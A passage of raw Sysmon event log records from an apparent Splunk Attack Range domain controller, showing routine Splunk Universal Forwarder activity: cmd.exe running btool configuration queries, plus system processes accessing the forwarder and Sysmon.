13:34:16.158{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E58-6005-3F00-00000000A301}3760C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001660Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.158{59A5CD1D-8E58-6005-3E00-00000000A301}37403744C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8E58-6005-3F00-00000000A301}3760C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001659Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.158{59A5CD1D-8E58-6005-3F00-00000000A301}3760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8E58-6005-3E00-00000000A301}3740C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool web list settings --no-log 10341000x80000000000000001658Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.142{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E58-6005-3E00-00000000A301}3740C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001657Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.142{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E58-6005-3E00-00000000A301}3740C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001656Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.142{59A5CD1D-8E58-6005-3D00-00000000A301}37283732C:\Windows\system32\cmd.exe{59A5CD1D-8E58-6005-3E00-00000000A301}3740C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001655Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.149{59A5CD1D-8E58-6005-3E00-00000000A301}3740C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8E58-6005-3D00-00000000A301}3728C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool web list settings --no-log 10341000x80000000000000001654Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.142{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E58-6005-3D00-00000000A301}3728C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001653Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.142{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E58-6005-3D00-00000000A301}3728C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001652Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.126{59A5CD1D-8E58-6005-3C00-00000000A301}37083712C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8E58-6005-3D00-00000000A301}3728C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+146d6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001651Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.142{59A5CD1D-8E58-6005-3D00-00000000A301}3728C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E58-6005-3C00-00000000A301}3708C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000001650Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.126{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001649Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.126{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001648Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.126{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001647Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.126{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001646Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.126{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001645Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.126{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001644Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.126{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001643Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.126{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001642Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.126{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001641Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.126{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E58-6005-3C00-00000000A301}3708C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001640Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.126{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E58-6005-3C00-00000000A301}3708C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001639Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.126{59A5CD1D-8E58-6005-3B00-00000000A301}36963700C:\Windows\system32\cmd.exe{59A5CD1D-8E58-6005-3C00-00000000A301}3708C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001638Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.129{59A5CD1D-8E58-6005-3C00-00000000A301}3708C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{59A5CD1D-8E58-6005-3B00-00000000A301}3696C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000001637Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.126{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E58-6005-3B00-00000000A301}3696C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001636Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.111{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E58-6005-3B00-00000000A301}3696C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001635Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.111{59A5CD1D-8E56-6005-3000-00000000A301}25323660C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E58-6005-3B00-00000000A301}3696C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7d48|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001634Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.124{59A5CD1D-8E58-6005-3B00-00000000A301}3696C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001633Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.111{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001632Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.095{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E58-6005-3A00-00000000A301}3664C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001631Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.095{59A5CD1D-8E44-6005-0A00-00000000A301}8482684C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001630Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.080{59A5CD1D-8E57-6005-3800-00000000A301}35283548C:\Windows\system32\conhost.exe{59A5CD1D-8E58-6005-3900-00000000A301}3640C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001629Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.080{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E58-6005-3900-00000000A301}3640C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001628Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.080{59A5CD1D-8E57-6005-3700-00000000A301}35203524C:\Windows\system32\cmd.exe{59A5CD1D-8E58-6005-3900-00000000A301}3640C:\Program 